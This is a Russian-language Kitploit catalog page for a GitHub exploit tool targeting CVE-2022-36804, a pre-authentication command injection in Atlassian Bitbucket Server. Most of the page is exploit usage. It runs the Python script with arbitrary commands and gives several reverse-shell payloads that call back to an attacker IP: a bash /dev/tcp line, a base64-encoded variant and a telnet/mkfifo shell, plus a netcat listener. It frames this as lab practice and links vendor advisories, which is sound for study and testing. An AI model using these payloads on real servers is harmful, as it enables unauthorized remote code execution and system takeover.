Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2022-36804 — A critical command injection vulnerability was found in multiple API endpoints of the Atlassian Bit bucket Server and Data center. This vulnerability affects all versions of Bitbucket Server and Data Center released before versions <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2, and <8.3.1 | Kitploit
Инструменты/GitHubGitHub/walnutsecurity/cve-2022-36804
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLabs & Practice
GitHubwalnutsecurity/cve-2022-36804

cve-2022-36804

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

843 лет назадЕщё не проверено

A critical command injection vulnerability was found in multiple API endpoints of the Atlassian Bit bucket Server and Data center. This vulnerability affects all versions of Bitbucket Server and Data Center released before versions <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2, and <8.3.1

Поделиться

CVE-2022-36804: Pre-Auth RCE в Atlassian Bitbucket Server

Критическая уязвимость внедрения команд была обнаружена в нескольких конечных точках API сервера Atlassian Bitbucket и Data Center. Эта уязвимость затрагивает все версии Bitbucket Server и Data Center, выпущенные до версий <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 и <8.3.1.

Лаборатория CVE-2022-36804

Сборка Docker

root@kitploit:~
docker build -t bitbucket .

Запуск Docker

root@kitploit:~
docker run -it bitbucket

Использование cve-2022-36804.py

Проверка на удаленное выполнение кода (RCE)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

Проверка RCE с пользовательской командой (cmd)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

Проверка RCE с пользовательской командой, ключом проекта и именем репозитория

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

Проверка для приватного репозитория

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7

Получение оболочки через netcat

Замените 172.17.0.3 на свой локальный IP-адрес

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"

Запустите netcat слушатель с помощью:

root@kitploit:~
nc -lvp 4444

Преобразуйте /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 в base64 на случай ошибки выполнения полезной нагрузки.

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"

Если вы все еще сталкиваетесь с ошибкой, выполните команду ниже:

TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"

Рекомендуется установить уязвимую версию Bitbucket Server на машине Windows/Linux для практики. Так будет проще получить обратную оболочку по сравнению с образами Docker.

Дополнительную информацию можно найти здесь.

Ссылки

  • https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
  • https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
Скачать инструмент